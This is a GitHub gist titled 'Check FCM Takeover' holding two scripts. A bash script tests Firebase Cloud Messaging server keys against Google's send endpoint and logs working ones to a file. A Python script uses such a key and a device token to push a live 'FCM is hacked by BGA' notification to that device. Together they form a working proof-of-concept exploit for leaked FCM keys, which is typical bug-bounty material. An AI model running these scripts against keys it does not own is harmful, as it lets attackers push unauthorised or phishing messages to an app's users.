Skip to content

Instantly share code, notes, and snippets.

@uzeyirdestan

uzeyirdestan/checkApiKey.sh

Created October 6, 2020 22:20
Show Gist options
  • Save uzeyirdestan/cbe20b7d95be4f962a8f17737c77267c to your computer and use it in GitHub Desktop.
Save uzeyirdestan/cbe20b7d95be4f962a8f17737c77267c to your computer and use it in GitHub Desktop.
Download ZIP
Check FCM Takeover
Raw
checkApiKey.sh
#!/bin/bash
RED='\033[0;31m'
NC='\033[0m'
echo "Enter Key:"
read key
echo "Testing => $key"
code=`curl --header "Authorization: key=$key" --header Content-Type:"application/json" -s -o /dev/null -w "%{http_code}" -d "{\"registration_ids\":[\"ABC\"]}" 'https://fcm.googleapis.com/fcm/send'`
if [ "$code" == "200" ]
then
echo -e "${RED}[*] $key${NC} Key is vulnerable to FCM take over"
echo "$key" >> valid_keys.txt
fi
Raw
firebase.py
#!/usr/bin/python3
from pyfcm import FCMNotification
import argparse
# Input Management
ap = argparse.ArgumentParser()
ap.add_argument(
"-sk", "--serverkey", required=True,
help="FCM Server Key found"
)
ap.add_argument(
"-iid", "--iid", required=True,
help="IID Token source from the Client App"
)
args = vars(ap.parse_args())
server_key = args["serverkey"]
iid = args["iid"]
#Authorization
push_service = FCMNotification(api_key=server_key)
#Notification Payload
registration_id = iid
message_title = "Oh no :("
message_body = "FCM is hacked by BGA"
#Building Send Request and Executing it.
result = push_service.notify_single_device(registration_id=registration_id, message_title=message_title, message_body=message_body,dry_run=False)
print(result)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment